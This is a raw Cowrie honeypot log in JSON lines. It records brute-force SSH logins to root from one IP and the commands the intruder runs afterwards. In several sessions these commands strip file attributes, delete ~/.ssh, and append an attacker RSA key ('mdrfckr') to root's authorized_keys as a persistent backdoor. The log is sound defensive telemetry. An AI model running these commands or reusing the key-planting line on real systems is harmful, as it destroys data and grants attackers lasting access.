{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:47:07.801435Z","src_ip":"212.227.235.229","session":"dabe18572fe2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:47:08.143922Z","src_ip":"212.227.235.229","session":"dabe18572fe2"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:08.221215Z","src_ip":"212.227.235.229","session":"66c23cfe8397"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:08.222159Z","src_ip":"212.227.235.229","session":"dabe18572fe2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33090,"dst_ip":"1.2.3.4","dst_port":22,"session":"c19ec277e84e","protocol":"ssh","message":"New connection: 212.227.235.229:33090 (1.2.3.4:22) [session: c19ec277e84e]","sensor":"my-vps","timestamp":"2025-08-26T04:47:17.909909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:47:17.910930Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:47:18.946818Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.login.success","username":"root","password":"qazxswedc123","message":"login attempt [root/qazxswedc123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:47:20.060679Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:47:20.664927Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:47:20.665640Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:47:20.666495Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:20.936423Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:47:21.488639Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:47:21.489343Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:47:21.759907Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:21.760980Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33092,"dst_ip":"1.2.3.4","dst_port":22,"session":"4879a4c9e72b","protocol":"ssh","message":"New connection: 212.227.235.229:33092 (1.2.3.4:22) [session: 4879a4c9e72b]","sensor":"my-vps","timestamp":"2025-08-26T04:47:22.029449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:47:22.030439Z","src_ip":"212.227.235.229","session":"4879a4c9e72b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:47:22.300253Z","src_ip":"212.227.235.229","session":"4879a4c9e72b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:47:23.423055Z","src_ip":"212.227.235.229","session":"4879a4c9e72b"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:24.695263Z","src_ip":"212.227.235.229","session":"4879a4c9e72b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35366,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a969c894d58","protocol":"ssh","message":"New connection: 212.227.235.229:35366 (1.2.3.4:22) [session: 3a969c894d58]","sensor":"my-vps","timestamp":"2025-08-26T04:47:24.963064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:47:24.964398Z","src_ip":"212.227.235.229","session":"3a969c894d58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:47:25.232818Z","src_ip":"212.227.235.229","session":"3a969c894d58"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:47:26.349331Z","src_ip":"212.227.235.229","session":"3a969c894d58"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:26.619540Z","src_ip":"212.227.235.229","session":"c19ec277e84e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:26.620388Z","src_ip":"212.227.235.229","session":"3a969c894d58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55574,"dst_ip":"1.2.3.4","dst_port":22,"session":"564644f733dd","protocol":"ssh","message":"New connection: 212.227.235.229:55574 (1.2.3.4:22) [session: 564644f733dd]","sensor":"my-vps","timestamp":"2025-08-26T04:47:27.539985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:47:27.540746Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:47:27.820380Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.login.success","username":"root","password":"88888888","message":"login attempt [root/88888888] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:47:28.982327Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:47:29.609773Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:47:29.610478Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:47:29.611412Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:29.892833Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:47:30.467731Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:47:30.468474Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:47:30.749955Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:30.751139Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55580,"dst_ip":"1.2.3.4","dst_port":22,"session":"976c689698f4","protocol":"ssh","message":"New connection: 212.227.235.229:55580 (1.2.3.4:22) [session: 976c689698f4]","sensor":"my-vps","timestamp":"2025-08-26T04:47:31.028526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:47:31.029282Z","src_ip":"212.227.235.229","session":"976c689698f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:47:31.309307Z","src_ip":"212.227.235.229","session":"976c689698f4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:47:32.470989Z","src_ip":"212.227.235.229","session":"976c689698f4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:33.753279Z","src_ip":"212.227.235.229","session":"976c689698f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55592,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf70d2f360ef","protocol":"ssh","message":"New connection: 212.227.235.229:55592 (1.2.3.4:22) [session: cf70d2f360ef]","sensor":"my-vps","timestamp":"2025-08-26T04:47:34.031112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:47:34.032359Z","src_ip":"212.227.235.229","session":"cf70d2f360ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:47:34.312161Z","src_ip":"212.227.235.229","session":"cf70d2f360ef"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:47:35.473485Z","src_ip":"212.227.235.229","session":"cf70d2f360ef"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:35.754935Z","src_ip":"212.227.235.229","session":"cf70d2f360ef"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:35.756922Z","src_ip":"212.227.235.229","session":"564644f733dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3992,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f9ee78949e4","protocol":"telnet","message":"New connection: 212.227.235.229:3992 (1.2.3.4:23) [session: 4f9ee78949e4]","sensor":"my-vps","timestamp":"2025-08-26T04:47:35.979567Z"}
{"eventid":"cowrie.session.closed","duration":13.480741500854492,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:47:49.460237Z","src_ip":"212.227.235.229","session":"4f9ee78949e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33132,"dst_ip":"1.2.3.4","dst_port":22,"session":"32445dbdd10d","protocol":"ssh","message":"New connection: 212.227.235.229:33132 (1.2.3.4:22) [session: 32445dbdd10d]","sensor":"my-vps","timestamp":"2025-08-26T04:48:02.918337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:48:02.919162Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
